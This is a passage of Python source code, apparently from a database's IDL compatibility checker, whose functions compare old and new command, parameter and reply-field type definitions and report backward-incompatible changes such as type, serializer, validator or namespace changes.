\"\"\"Check if sub_list is a subset of the super_list and log an error if not.\"\"\"\n if not set(sub_list).issubset(super_list):\n ctxt.add_reply_field_not_subset_error(cmd_name, field_name, type_name, file_path)\n\n\ndef check_superset(ctxt: IDLCompatibilityContext, cmd_name: str, type_name: str,\n super_list: List[Union[str, syntax.EnumValue]],\n sub_list: List[Union[str, syntax.EnumValue]], file_path: str,\n param_name: Optional[str], is_command_parameter: bool):\n # pylint: disable=too-many-arguments\n \"\"\"Check if super_list is a superset of the sub_list and log an error if not.\"\"\"\n if not set(super_list).issuperset(sub_list):\n ctxt.add_command_or_param_type_not_superset_error(cmd_name, type_name, file_path,\n param_name, is_command_parameter)\n\n\ndef check_reply_field_type_recursive(ctxt: IDLCompatibilityContext,\n field_pair: FieldCompatibilityPair) -> None:\n # pylint: disable=too-many-branches\n \"\"\"Check compatibility between old and new reply field type if old field type is a syntax.Type instance.\"\"\"\n old_field = field_pair.old\n new_field = field_pair.new\n old_field_type = old_field.field_type\n new_field_type = new_field.field_type\n cmd_name = field_pair.cmd_name\n field_name = field_pair.field_name\n\n # If the old field is unstable, we only add errors related to the use of 'any' as the\n # bson_serialization_type. For all other errors, we check that the old field is stable\n # before adding an error.\n if not isinstance(new_field_type, syntax.Type):\n if not old_field.unstable:\n ctxt.add_new_reply_field_type_enum_or_struct_error(\n cmd_name, field_name, new_field_type.name, old_field_type.name,\n new_field.idl_file_path)\n return\n\n # If bson_serialization_type switches from 'any' to non-any type.\n if \"any\" in old_field_type.bson_serialization_type and \"any\" not in new_field_type.bson_serialization_type:\n ctxt.add_old_reply_field_bson_any_error(cmd_name, field_name, old_field_type.name,\n new_field_type.name, old_field.idl_file_path)\n return\n\n # If bson_serialization_type switches from non-any to 'any' type.\n if \"any\" not in old_field_type.bson_serialization_type and \"any\" in new_field_type.bson_serialization_type:\n ctxt.add_new_reply_field_bson_any_error(cmd_name, field_name, old_field_type.name,\n new_field_type.name, new_field.idl_file_path)\n return\n\n allow_name: str = cmd_name + \"-reply-\" + field_name\n\n if \"any\" in old_field_type.bson_serialization_type:\n # If 'any' is not explicitly allowed as the bson_serialization_type.\n if allow_name not in ALLOW_ANY_TYPE_LIST:\n ctxt.add_old_reply_field_bson_any_not_allowed_error(\n cmd_name, field_name, old_field_type.name, old_field.idl_file_path)\n return\n\n # If cpp_type is changed, it's a potential breaking change.\n if old_field_type.cpp_type != new_field_type.cpp_type:\n ctxt.add_reply_field_cpp_type_not_equal_error(cmd_name, field_name, new_field_type.name,\n new_field.idl_file_path)\n\n # If serializer is changed, it's a potential breaking change.\n if (not old_field.unstable) and old_field_type.serializer != new_field_type.serializer:\n ctxt.add_reply_field_serializer_not_equal_error(\n cmd_name, field_name, new_field_type.name, new_field.idl_file_path)\n\n # If deserializer is changed, it's a potential breaking change.\n if (not old_field.unstable) and old_field_type.deserializer != new_field_type.deserializer:\n ctxt.add_reply_field_deserializer_not_equal_error(\n cmd_name, field_name, new_field_type.name, new_field.idl_file_path)\n\n if isinstance(old_field_type, syntax.VariantType):\n # If the new type is not variant just check the single type.\n new_variant_types = new_field_type.variant_types if isinstance(\n new_field_type, syntax.VariantType) else [new_field_type]\n old_variant_types = old_field_type.variant_types\n\n # Check that new variant types are a subset of old variant types.\n for new_variant_type in new_variant_types:\n for old_variant_type in old_variant_types:\n if old_variant_type.name == new_variant_type.name:\n # Check that the old and new version of each variant type is also compatible.\n old = FieldCompatibility(old_variant_type, old_field.idl_file,\n old_field.idl_file_path, old_field.unstable,\n old_field.optional)\n new = FieldCompatibility(new_variant_type, new_field.idl_file,\n new_field.idl_file_path, new_field.unstable,\n new_field.optional)\n check_reply_field_type(ctxt,\n FieldCompatibilityPair(old, new, cmd_name, field_name))\n break\n\n else:\n # new_variant_type was not found in old_variant_types.\n if not old_field.unstable:\n ctxt.add_new_reply_field_variant_type_not_subset_error(\n cmd_name, field_name, new_variant_type.name, new_field.idl_file_path)\n\n # If new type is variant and has a struct as a variant type, compare old and new variant_struct_type.\n # Since enums can't be part of variant types, we don't explicitly check for enums.\n if isinstance(new_field_type,\n syntax.VariantType) and new_field_type.variant_struct_type is not None:\n if old_field_type.variant_struct_type is None and not old_field.unstable:\n ctxt.add_new_reply_field_variant_type_not_subset_error(\n cmd_name, field_name, new_field_type.variant_struct_type.name,\n new_field.idl_file_path)\n else:\n check_reply_fields(ctxt, old_field_type.variant_struct_type,\n new_field_type.variant_struct_type, cmd_name, old_field.idl_file,\n new_field.idl_file, old_field.idl_file_path,\n new_field.idl_file_path)\n\n elif not old_field.unstable:\n if isinstance(new_field_type, syntax.VariantType):\n ctxt.add_new_reply_field_variant_type_error(cmd_name, field_name, old_field_type.name,\n new_field.idl_file_path)\n else:\n check_subset(ctxt, cmd_name, field_name, new_field_type.name,\n new_field_type.bson_serialization_type,\n old_field_type.bson_serialization_type, new_field.idl_file_path)\n\n\ndef check_reply_field_type(ctxt: IDLCompatibilityContext, field_pair: FieldCompatibilityPair):\n \"\"\"Check compatibility between old and new reply field type.\"\"\"\n # pylint: disable=too-many-branches\n old_field = field_pair.old\n new_field = field_pair.new\n array_check = check_array_type(ctxt, \"reply_field\", old_field.field_type, new_field.field_type,\n field_pair.cmd_name, 'type', old_field.idl_file_path,\n new_field.idl_file_path, old_field.unstable)\n if array_check == ArrayTypeCheckResult.INVALID:\n return\n\n if array_check == ArrayTypeCheckResult.TRUE:\n old_field.field_type = old_field.field_type.element_type\n new_field.field_type = new_field.field_type.element_type\n\n old_field_type = old_field.field_type\n new_field_type = new_field.field_type\n cmd_name = field_pair.cmd_name\n field_name = field_pair.field_name\n if old_field_type is None:\n ctxt.add_reply_field_type_invalid_error(cmd_name, field_name, old_field.idl_file_path)\n ctxt.errors.dump_errors()\n sys.exit(1)\n if new_field_type is None:\n ctxt.add_reply_field_type_invalid_error(cmd_name, field_name, new_field.idl_file_path)\n ctxt.errors.dump_errors()\n sys.exit(1)\n\n if isinstance(old_field_type, syntax.Type):\n check_reply_field_type_recursive(ctxt, field_pair)\n\n elif isinstance(old_field_type, syntax.Enum) and not old_field.unstable:\n if isinstance(new_field_type, syntax.Enum):\n check_subset(ctxt, cmd_name, field_name, new_field_type.name, new_field_type.values,\n old_field_type.values, new_field.idl_file_path)\n else:\n ctxt.add_new_reply_field_type_not_enum_error(cmd_name, field_name, new_field_type.name,\n old_field_type.name,\n new_field.idl_file_path)\n elif isinstance(old_field_type, syntax.Struct):\n if isinstance(new_field_type, syntax.Struct):\n check_reply_fields(ctxt, old_field_type, new_field_type, cmd_name, old_field.idl_file,\n new_field.idl_file, old_field.idl_file_path, new_field.idl_file_path)\n else:\n if not old_field.unstable:\n ctxt.add_new_reply_field_type_not_struct_error(\n cmd_name, field_name, new_field_type.name, old_field_type.name,\n new_field.idl_file_path)\n\n\ndef check_array_type(ctxt: IDLCompatibilityContext, symbol: str,\n old_type: Optional[Union[syntax.Enum, syntax.Struct, syntax.Type]],\n new_type: Optional[Union[syntax.Enum, syntax.Struct, syntax.Type]],\n cmd_name: str, symbol_name: str, old_idl_file_path: str,\n new_idl_file_path: str, old_field_unstable: bool) -> ArrayTypeCheckResult:\n \"\"\"\n Check compatibility between old and new ArrayTypes.\n\n :returns:\n - ArrayTypeCheckResult.TRUE : when the old type and new type are of array type.\n - ArrayTypeCheckResult.FALSE : when the old type and new type aren't of array type.\n - ArrayTypeCheckResult.INVALID : when one of the types is not of array type while the other one is.\n \"\"\"\n # pylint: disable=too-many-arguments,too-many-branches\n old_is_array = isinstance(old_type, syntax.ArrayType)\n new_is_array = isinstance(new_type, syntax.ArrayType)\n if not old_is_array and not new_is_array:\n return ArrayTypeCheckResult.FALSE\n\n if (not old_is_array or not new_is_array) and not old_field_unstable:\n ctxt.add_type_not_array_error(symbol, cmd_name, symbol_name, new_type.name, old_type.name,\n new_idl_file_path if old_is_array else old_idl_file_path)\n return ArrayTypeCheckResult.INVALID\n\n return ArrayTypeCheckResult.TRUE\n\n\ndef check_reply_field(ctxt: IDLCompatibilityContext, old_field: syntax.Field,\n new_field: syntax.Field, cmd_name: str, old_idl_file: syntax.IDLParsedSpec,\n new_idl_file: syntax.IDLParsedSpec, old_idl_file_path: str,\n new_idl_file_path: str):\n \"\"\"Check compatibility between old and new reply field.\"\"\"\n # pylint: disable=too-many-arguments\n old_field_type = get_field_type(old_field, old_idl_file, old_idl_file_path)\n new_field_type = get_field_type(new_field, new_idl_file, new_idl_file_path)\n old_field_optional = old_field.optional or (old_field_type\n and old_field_type.name == \"optionalBool\")\n new_field_optional = new_field.optional or (new_field_type\n and new_field_type.name == \"optionalBool\")\n field_name: str = cmd_name + \"-reply-\" + new_field.name\n if not old_field.unstable and field_name not in IGNORE_UNSTABLE_LIST:\n if new_field.unstable and field_name not in IGNORE_UNSTABLE_LIST:\n ctxt.add_new_reply_field_unstable_error(cmd_name, new_field.name, new_idl_file_path)\n if new_field_optional and not old_field_optional:\n ctxt.add_new_reply_field_optional_error(cmd_name, new_field.name, new_idl_file_path)\n\n if new_field.validator:\n if old_field.validator:\n if new_field.validator != old_field.validator:\n ctxt.add_reply_field_validators_not_equal_error(cmd_name, new_field.name,\n new_idl_file_path)\n else:\n ctxt.add_reply_field_contains_validator_error(cmd_name, new_field.name,\n new_idl_file_path)\n\n old_field_compatibility = FieldCompatibility(old_field_type, old_idl_file, old_idl_file_path,\n old_field.unstable, old_field.optional)\n new_field_compatibility = FieldCompatibility(new_field_type, new_idl_file, new_idl_file_path,\n new_field.unstable, new_field.optional)\n field_pair = FieldCompatibilityPair(old_field_compatibility, new_field_compatibility, cmd_name,\n old_field.name)\n\n check_reply_field_type(ctxt, field_pair)\n\n\ndef check_reply_fields(ctxt: IDLCompatibilityContext, old_reply: syntax.Struct,\n new_reply: syntax.Struct, cmd_name: str, old_idl_file: syntax.IDLParsedSpec,\n new_idl_file: syntax.IDLParsedSpec, old_idl_file_path: str,\n new_idl_file_path: str):\n \"\"\"Check compatibility between old and new reply fields.\"\"\"\n # pylint: disable=too-many-arguments,too-many-branches\n for new_chained_type in new_reply.chained_types or []:\n resolved_new_chained_type = get_chained_type_or_struct(new_chained_type, new_idl_file,\n new_idl_file_path)\n if resolved_new_chained_type is not None:\n for old_chained_type in old_reply.chained_types or []:\n resolved_old_chained_type = get_chained_type_or_struct(\n old_chained_type, old_idl_file, old_idl_file_path)\n if (resolved_old_chained_type is not None\n and resolved_old_chained_type.name == resolved_new_chained_type.name):\n # Check that the old and new version of each chained type is also compatible.\n old = FieldCompatibility(resolved_old_chained_type, old_idl_file,\n old_idl_file_path, unstable=False, optional=False)\n new = FieldCompatibility(resolved_new_chained_type, new_idl_file,\n new_idl_file_path, unstable=False, optional=False)\n\n check_reply_field_type(\n ctxt, FieldCompatibilityPair(old, new, cmd_name, old_reply.name))\n break\n\n else:\n # new chained type was not found in old chained types.\n ctxt.add_new_reply_chained_type_not_subset_error(\n cmd_name, new_reply.name, resolved_new_chained_type.name, new_idl_file_path)\n\n old_reply_fields = get_all_struct_fields(old_reply, old_idl_file, old_idl_file_path)\n new_reply_fields = get_all_struct_fields(new_reply, new_idl_file, new_idl_file_path)\n for old_field in old_reply_fields or []:\n new_field_exists = False\n for new_field in new_reply_fields or []:\n if new_field.name == old_field.name:\n new_field_exists = True\n check_reply_field(ctxt, old_field, new_field, cmd_name, old_idl_file, new_idl_file,\n old_idl_file_path, new_idl_file_path)\n\n break\n\n if not new_field_exists and not old_field.unstable:\n ctxt.add_new_reply_field_missing_error(cmd_name, old_field.name, old_idl_file_path)\n\n for new_field in new_reply_fields or []:\n # Check that all fields in the new IDL have specified the 'unstable' field.\n if new_field.unstable is None:\n ctxt.add_new_reply_field_requires_unstable_error(cmd_name, new_field.name,\n new_idl_file_path)\n\n # Check that newly added fields do not have an unallowed use of 'any' as the\n # bson_serialization_type.\n newly_added = True\n for old_field in old_reply_fields or []:\n if new_field.name == old_field.name:\n newly_added = False\n\n if newly_added:\n allow_name: str = cmd_name + \"-reply-\" + new_field.name\n\n new_field_type = get_field_type(new_field, new_idl_file, new_idl_file_path)\n # If we encounter a bson_serialization_type of None, we skip checking if 'any' is used.\n if isinstance(\n new_field_type, syntax.Type\n ) and new_field_type.bson_serialization_type is not None and \"any\" in new_field_type.bson_serialization_type:\n # If 'any' is not explicitly allowed as the bson_serialization_type.\n any_allow = allow_name in ALLOW_ANY_TYPE_LIST or new_field_type.name == 'optionalBool'\n if not any_allow:\n ctxt.add_new_reply_field_bson_any_not_allowed_error(\n cmd_name, new_field.name, new_field_type.name, new_idl_file_path)\n\n\ndef check_param_or_command_type_recursive(ctxt: IDLCompatibilityContext,\n field_pair: FieldCompatibilityPair,\n is_command_parameter: bool):\n # pylint: disable=too-many-branches,too-many-locals\n \"\"\"\n Check compatibility between old and new command or param type recursively.\n\n If the old type is a syntax.Type instance, check the compatibility between the old and new\n command type or parameter type recursively.\n \"\"\"\n old_field = field_pair.old\n new_field = field_pair.new\n old_type = old_field.field_type\n new_type = new_field.field_type\n cmd_name = field_pair.cmd_name\n param_name = field_pair.field_name\n\n # If the old field is unstable, we only add errors related to the use of 'any' as the\n # bson_serialization_type. For all other errors, we check that the old field is stable\n # before adding an error.\n\n if not isinstance(new_type, syntax.Type):\n if not old_field.unstable:\n ctxt.add_new_command_or_param_type_enum_or_struct_error(\n cmd_name, new_type.name, old_type.name, new_field.idl_file_path, param_name,\n is_command_parameter)\n return\n\n allow_name: str = cmd_name + \"-param-\" + param_name if is_command_parameter else cmd_name\n\n # If bson_serialization_type switches from 'any' to non-any type.\n if \"any\" in old_type.bson_serialization_type and \"any\" not in new_type.bson_serialization_type:\n ctxt.add_old_command_or_param_type_bson_any_error(cmd_name, old_type.name, new_type.name,\n old_field.idl_file_path, param_name,\n is_command_parameter)\n return\n\n # If bson_serialization_type switches from non-any to 'any' type.\n if \"any\" not in old_type.bson_serialization_type and \"any\" in new_type.bson_serialization_type:\n ctxt.add_new_command_or_param_type_bson_any_error(cmd_name, old_type.name, new_type.name,\n new_field.idl_file_path, param_name,\n is_command_parameter)\n return\n\n if \"any\" in old_type.bson_serialization_type:\n # If 'any' is not explicitly allowed as the bson_serialization_type.\n if allow_name not in ALLOW_ANY_TYPE_LIST:\n ctxt.add_old_command_or_param_type_bson_any_not_allowed_error(\n cmd_name, old_type.name, old_field.idl_file_path, param_name, is_command_parameter)\n return\n\n # If cpp_type is changed, it's a potential breaking change.\n if old_type.cpp_type != new_type.cpp_type:\n ctxt.add_command_or_param_cpp_type_not_equal_error(\n cmd_name, new_type.name, new_field.idl_file_path, param_name, is_command_parameter)\n\n # If serializer is changed, it's a potential breaking change.\n if (not old_field.unstable) and old_type.serializer != new_type.serializer:\n ctxt.add_command_or_param_serializer_not_equal_error(\n cmd_name, new_type.name, new_field.idl_file_path, param_name, is_command_parameter)\n\n # If deserializer is changed, it's a potential breaking change.\n if (not old_field.unstable) and old_type.deserializer != new_type.deserializer:\n ctxt.add_command_or_param_deserializer_not_equal_error(\n cmd_name, new_type.name, new_field.idl_file_path, param_name, is_command_parameter)\n\n if isinstance(old_type, syntax.VariantType):\n if not isinstance(new_type, syntax.VariantType):\n if not old_field.unstable:\n ctxt.add_new_command_or_param_type_not_variant_type_error(\n cmd_name, new_type.name, new_field.idl_file_path, param_name,\n is_command_parameter)\n else:\n new_variant_types = new_type.variant_types\n old_variant_types = old_type.variant_types\n\n # Check that new variant types are a superset of old variant types.\n for old_variant_type in old_variant_types:\n for new_variant_type in new_variant_types:\n # object->object_owned serialize to the same bson type. object_owned->object is\n # not always safe so we only limit this special case to object->object_owned.\n if (old_variant_type.name == \"object\" and new_variant_type.name == \"object_owned\") or \\\n old_variant_type.name == new_variant_type.name:\n # Check that the old and new version of each variant type is also compatible.\n old = FieldCompatibility(old_variant_type, old_field.idl_file,\n old_field.idl_file_path, old_field.unstable,\n old_field.optional)\n new = FieldCompatibility(new_variant_type, new_field.idl_file,\n new_field.idl_file_path, new_field.unstable,\n new_field.optional)\n check_param_or_command_type(\n ctxt, FieldCompatibilityPair(old, new, cmd_name, param_name),\n is_command_parameter)\n break\n else:\n if not old_field.unstable:\n # old_variant_type was not found in new_variant_types.\n ctxt.add_new_command_or_param_variant_type_not_superset_error(\n cmd_name, old_variant_type.name, new_field.idl_file_path, param_name,\n is_command_parameter)\n\n # If old and new types both have a struct as a variant type, compare old and new variant_struct_type.\n # Since enums can't be part of variant types, we don't explicitly check for enums.\n if old_type.variant_struct_type is not None:\n if new_type.variant_struct_type is not None:\n check_command_params_or_type_struct_fields(\n ctxt, old_type.variant_struct_type, new_type.variant_struct_type, cmd_name,\n old_field.idl_file, new_field.idl_file, old_field.idl_file_path,\n new_field.idl_file_path, is_command_parameter)\n\n # If old type has a variant struct type and new type does not have a variant struct type.\n elif not old_field.unstable:\n ctxt.add_new_command_or_param_variant_type_not_superset_error(\n cmd_name, old_type.variant_struct_type.name, new_field.idl_file_path,\n param_name, is_command_parameter)\n\n elif not old_field.unstable:\n check_superset(ctxt, cmd_name, new_type.name, new_type.bson_serialization_type,\n old_type.bson_serialization_type, new_field.idl_file_path, param_name,\n is_command_parameter)\n\n\ndef check_param_or_command_type(ctxt: IDLCompatibilityContext, field_pair: FieldCompatibilityPair,\n is_command_parameter: bool):\n \"\"\"Check compatibility between old and new command parameter type or command type.\"\"\"\n # pylint: disable=too-many-branches\n old_field = field_pair.old\n new_field = field_pair.new\n array_check = check_array_type(\n ctxt, \"command_parameter\" if is_command_parameter else \"command_namespace\",\n old_field.field_type, new_field.field_type, field_pair.cmd_name,\n field_pair.field_name if is_command_parameter else \"type\", old_field.idl_file_path,\n new_field.idl_file_path, old_field.unstable)\n if array_check == ArrayTypeCheckResult.INVALID:\n return\n\n if array_check == ArrayTypeCheckResult.TRUE:\n old_field.field_type = old_field.field_type.element_type\n new_field.field_type = new_field.field_type.element_type\n\n old_type = old_field.field_type\n new_type = new_field.field_type\n if old_type is None:\n ctxt.add_command_or_param_type_invalid_error(field_pair.cmd_name, old_field.idl_file_path,\n field_pair.field_name, is_command_parameter)\n ctxt.errors.dump_errors()\n sys.exit(1)\n if new_type is None:\n ctxt.add_command_or_param_type_invalid_error(field_pair.cmd_name, new_field.idl_file_path,\n field_pair.field_name, is_command_parameter)\n ctxt.errors.dump_errors()\n sys.exit(1)\n\n if isinstance(old_type, syntax.Type):\n check_param_or_command_type_recursive(ctxt, field_pair, is_command_parameter)\n\n # Only add type errors if the old field is stable.\n elif isinstance(old_type, syntax.Enum) and not old_field.unstable:\n if isinstance(new_type, syntax.Enum):\n check_superset(ctxt, field_pair.cmd_name, new_type.name, new_type.values,\n old_type.values, new_field.idl_file_path, field_pair.field_name,\n is_command_parameter)\n else:\n ctxt.add_new_command_or_param_type_not_enum_error(\n field_pair.cmd_name, new_type.name, old_type.name, new_field.idl_file_path,\n field_pair.field_name, is_command_parameter)\n\n elif isinstance(old_type, syntax.Struct):\n if isinstance(new_type, syntax.Struct):\n check_command_params_or_type_struct_fields(\n ctxt, old_type, new_type, field_pair.cmd_name, old_field.idl_file,\n new_field.idl_file, old_field.idl_file_path, new_field.idl_file_path,\n is_command_parameter)\n else:\n if not old_field.unstable:\n ctxt.add_new_command_or_param_type_not_struct_error(\n field_pair.cmd_name, new_type.name, old_type.name, new_field.idl_file_path,\n field_pair.field_name, is_command_parameter)\n\n\ndef check_param_or_type_validator(ctxt: IDLCompatibilityContext, old_field: syntax.Field,\n new_field: syntax.Field, cmd_name: str, new_idl_file_path: str,\n type_name: Optional[str], is_command_parameter: bool):\n \"\"\"\n Check compatibility between old and new validators.\n\n Check compatibility between old and new validators in command parameter type and command type\n struct fields.\n \"\"\"\n # pylint: disable=too-many-arguments\n if new_field.validator:\n if old_field.validator:\n if new_field.validator != old_field.validator:\n ctxt.add_command_or_param_type_validators_not_equal_error(\n cmd_name, new_field.name, new_idl_file_path, type_name, is_command_parameter)\n else:\n ctxt.add_command_or_param_type_contains_validator_error(\n cmd_name, new_field.name, new_idl_file_path, type_name, is_command_parameter)\n\n\ndef get_all_struct_fields(struct: syntax.Struct, idl_file: syntax.IDLParsedSpec,\n idl_file_path: str):\n \"\"\"Get all the fields of a struct, including the chained struct fields.\"\"\"\n all_fields = struct.fields or []\n for chained_struct in struct.chained_structs or []:\n resolved_chained_struct = get_chained_type_or_struct(chained_struct, idl_file,\n idl_file_path)\n if resolved_chained_struct is not None:\n for field in resolved_chained_struct.fields:\n all_fields.append(field)\n\n return all_fields\n\n\ndef check_command_params_or_type_struct_fields(\n ctxt: IDLCompatibilityContext, old_struct: syntax.Struct, new_struct: syntax.Struct,\n cmd_name: str, old_idl_file: syntax.IDLParsedSpec, new_idl_file: syntax.IDLParsedSpec,\n old_idl_file_path: str, new_idl_file_path: str, is_command_parameter: bool):\n \"\"\"Check compatibility between old and new parameters or command type fields.\"\"\"\n # pylint: disable=too-many-arguments,too-many-branches\n # Check chained types.\n for old_chained_type in old_struct.chained_types or []:\n resolved_old_chained_type = get_chained_type_or_struct(old_chained_type, old_idl_file,\n old_idl_file_path)\n if resolved_old_chained_type is not None:\n for new_chained_type in new_struct.chained_types or []:\n resolved_new_chained_type = get_chained_type_or_struct(\n new_chained_type, new_idl_file, new_idl_file_path)\n if (resolved_new_chained_type is not None\n and resolved_old_chained_type.name == resolved_new_chained_type.name):\n # Check that the old and new version of each chained type is also compatible.\n old = FieldCompatibility(resolved_old_chained_type, old_idl_file,\n old_idl_file_path, unstable=False, optional=False)\n new = FieldCompatibility(resolved_new_chained_type, new_idl_file,\n new_idl_file_path, unstable=False, optional=False)\n check_param_or_command_type(\n ctxt, FieldCompatibilityPair(old, new, cmd_name, old_struct.name),\n is_command_parameter=False)\n break\n\n else:\n # old chained type was not found in new chained types.\n ctxt.add_new_command_or_param_chained_type_not_superset_error(\n cmd_name, old_chained_type.name, new_idl_file_path, old_struct.name,\n is_command_parameter)\n\n old_struct_fields = get_all_struct_fields(old_struct, old_idl_file, old_idl_file_path)\n new_struct_fields = get_all_struct_fields(new_struct, new_idl_file, new_idl_file_path)\n\n # We need to special-case the stmtId parameter because it was removed. However, it's not a\n # breaking change to the API because it was added and removed behind a feature flag, so it was\n # never officially released.\n allow_list = [\"endSessions-param-stmtId\", \"refreshSessions-param-stmtId\"]\n\n for old_field in old_struct_fields or []:\n new_field_exists = False\n for new_field in new_struct_fields or []:\n if new_field.name == old_field.name:\n new_field_exists = True\n check_command_param_or_type_struct_field(\n ctxt, old_field, new_field, cmd_name, old_idl_file, new_idl_file,\n old_idl_file_path, new_idl_file_path, old_struct.name, is_command_parameter)\n\n break\n allow_name: str = cmd_name + \"-param-\" + old_field.name\n if not new_field_exists and not old_field.unstable and allow_name not in allow_list:\n ctxt.add_new_param_or_command_type_field_missing_error(\n cmd_name, old_field.name, old_idl_file_path, old_struct.name, is_command_parameter)\n\n # Check if a new field has been added to the parameters or type struct.\n # If so, it must be optional.\n for new_field in new_struct_fields or []:\n # Check that all fields in the new IDL have specified the 'unstable' field.\n if new_field.unstable is None:\n ctxt.add_new_param_or_command_type_field_requires_unstable_error(\n cmd_name, new_field.name, new_idl_file_path, is_command_parameter)\n\n newly_added = True\n for old_field in old_struct_fields or []:\n if new_field.name == old_field.name:\n newly_added = False\n\n if newly_added:\n new_field_type = get_field_type(new_field, new_idl_file, new_idl_file_path)\n new_field_optional = new_field.optional or (new_field_type\n and new_field_type.name == 'optionalBool')\n if not new_field_optional and not new_field.unstable:\n ctxt.add_new_param_or_command_type_field_added_required_error(\n cmd_name, new_field.name, new_idl_file_path, new_struct.name,\n is_command_parameter)\n\n # Check that a new field does not have an unallowed use of 'any' as the bson_serialization_type.\n any_allow_name: str = (cmd_name + \"-param-\" + new_field.name\n if is_command_parameter else cmd_name)\n # If we encounter a bson_serialization_type of None, we skip checking if 'any' is used.\n if isinstance(\n new_field_type, syntax.Type\n ) and new_field_type.bson_serialization_type is not None and \"any\" in new_field_type.bson_serialization_type:\n # If 'any' is not explicitly allowed as the bson_serialization_type.\n any_allow = any_allow_name in ALLOW_ANY_TYPE_LIST or new_field_type.name == 'optionalBool'\n if not any_allow:\n ctxt.add_new_command_or_param_type_bson_any_not_allowed_error(\n cmd_name, new_field_type.name, old_idl_file_path, new_field.name,\n is_command_parameter)\n\n\ndef check_command_param_or_type_struct_field(\n ctxt: IDLCompatibilityContext, old_field: syntax.Field, new_field: syntax.Field,\n cmd_name: str, old_idl_file: syntax.IDLParsedSpec, new_idl_file: syntax.IDLParsedSpec,\n old_idl_file_path: str, new_idl_file_path: str, type_name: Optional[str],\n is_command_parameter: bool):\n \"\"\"Check compatibility between the old and new command parameter or command type struct field.\"\"\"\n # pylint: disable=too-many-arguments\n field_name: str = cmd_name + \"-param-\" + new_field.name\n if not old_field.unstable and new_field.unstable and field_name not in IGNORE_UNSTABLE_LIST:\n ctxt.add_new_param_or_command_type_field_unstable_error(\n cmd_name, old_field.name, old_idl_file_path, type_name, is_command_parameter)\n # If old field is unstable and new field is stable, the new field should either be optional or\n # have a default value.\n old_field_type = get_field_type(old_field, old_idl_file, old_idl_file_path)\n new_field_type = get_field_type(new_field, new_idl_file, new_idl_file_path)\n old_field_optional = old_field.optional or (old_field_type\n and old_field_type.name == \"optionalBool\")\n new_field_optional = new_field.optional or (new_field_type\n and new_field_type.name == \"optionalBool\")\n if old_field.unstable and not new_field.unstable and not new_field_optional and new_field.default is None:\n ctxt.add_new_param_or_command_type_field_stable_required_no_default_error(\n cmd_name, old_field.name, old_idl_file_path, type_name, is_command_parameter)\n\n if old_field_optional and not new_field_optional:\n ctxt.add_new_param_or_command_type_field_required_error(\n cmd_name, old_field.name, old_idl_file_path, type_name, is_command_parameter)\n\n if not old_field.unstable:\n check_param_or_type_validator(ctxt, old_field, new_field, cmd_name, new_idl_file_path,\n type_name, is_command_parameter)\n\n old_field_compatibility = FieldCompatibility(old_field_type, old_idl_file, old_idl_file_path,\n old_field.unstable, old_field.optional)\n new_field_compatibility = FieldCompatibility(new_field_type, new_idl_file, new_idl_file_path,\n new_field.unstable, new_field.optional)\n field_pair = FieldCompatibilityPair(old_field_compatibility, new_field_compatibility, cmd_name,\n old_field.name)\n\n check_param_or_command_type(ctxt, field_pair, is_command_parameter)\n\n\ndef check_namespace(ctxt: IDLCompatibilityContext, old_cmd: syntax.Command, new_cmd: syntax.Command,\n old_idl_file: syntax.IDLParsedSpec, new_idl_file: syntax.IDLParsedSpec,\n old_idl_file_path: str, new_idl_file_path: str):\n \"\"\"Check compatibility between old and new namespace.\"\"\"\n # pylint: disable=too-many-arguments\n old_namespace = old_cmd.namespace\n new_namespace = new_cmd.namespace\n\n # IDL parser already checks that namespace must be one of these 4 types.\n if old_namespace == common.COMMAND_NAMESPACE_IGNORED:\n if new_namespace != common.COMMAND_NAMESPACE_IGNORED:\n ctxt.add_new_namespace_incompatible_error(old_cmd.command_name, old_namespace,\n new_namespace, new_idl_file_path)\n elif old_namespace == common.COMMAND_NAMESPACE_CONCATENATE_WITH_DB_OR_UUID:\n if new_namespace not in (common.COMMAND_NAMESPACE_IGNORED,\n common.COMMAND_NAMESPACE_CONCATENATE_WITH_DB_OR_UUID):\n ctxt.add_new_namespace_incompatible_error(old_cmd.command_name, old_namespace,\n new_namespace, new_idl_file_path)\n elif old_namespace == common.COMMAND_NAMESPACE_CONCATENATE_WITH_DB:\n if new_namespace == common.COMMAND_NAMESPACE_TYPE:\n ctxt.add_new_namespace_incompatible_error(old_cmd.command_name, old_namespace,\n new_namespace, new_idl_file_path)\n elif old_namespace == common.COMMAND_NAMESPACE_TYPE:\n old_type = get_field_type(old_cmd, old_idl_file, old_idl_file_path)\n if new_namespace == common.COMMAND_NAMESPACE_TYPE:\n new_type = get_field_type(new_cmd, new_idl_file, new_idl_file_path)\n old = FieldCompatibility(old_type, old_idl_file, old_idl_file_path, unstable=False,\n optional=False)\n new = FieldCompatibility(new_type, new_idl_file, new_idl_file_path, unstable=False,\n optional=False)\n\n check_param_or_command_type(ctxt,\n FieldCompatibilityPair(old, new, old_cmd.command_name, \"\"),\n is_command_parameter=False)\n\n # If old type is \"namespacestring\", the new namespace can be changed to any\n # of the other namespace types.\n elif old_type.name != \"namespacestring\":\n # Otherwise, the new namespace can only be changed to \"ignored\".\n if new_namespace != common.COMMAND_NAMESPACE_IGNORED:\n ctxt.add_new_namespace_incompatible_error(old_cmd.command_name, old_namespace,\n new_namespace, new_idl_file_path)\n else:\n assert False, 'unrecognized namespace option'\n\n\ndef check_error_reply(old_basic_types_path: str, new_basic_types_path: str,\n old_import_directories: List[str],\n new_import_directories: List[str]) -> IDLCompatibilityErrorCollection:\n \"\"\"Check IDL compatibility between old and new ErrorReply.\"\"\"\n old_idl_dir = os.path.dirname(old_basic_types_path)\n new_idl_dir = os.path.dirname(new_basic_types_path)\n ctxt = IDLCompatibilityContext(old_idl_dir, new_idl_dir, IDLCompatibilityErrorCollection())\n with open(old_basic_types_path) as old_file:\n old_idl_file = parser.parse(old_file, old_basic_types_path,\n CompilerImportResolver(old_import_directories))\n if old_idl_file.errors:\n old_idl_file.errors.dump_errors()\n raise ValueError(f\"Cannot parse {old_basic_types_path}\")\n\n old_error_reply_struct = old_idl_file.spec.symbols.get_struct(\"ErrorReply\")\n\n if old_error_reply_struct is None:\n ctxt.add_missing_error_reply_struct_error(old_basic_types_path)\n else:\n with open(new_basic_types_path) as new_file:\n new_idl_file = parser.parse(new_file, new_basic_types_path,\n CompilerImportResolver(new_import_directories))\n if new_idl_file.errors:\n new_idl_file.errors.dump_errors()\n raise ValueError(f\"Cannot parse {new_basic_types_path}\")\n\n new_error_reply_struct = new_idl_file.spec.symbols.get_struct(\"ErrorReply\")\n if new_error_reply_struct is None:\n 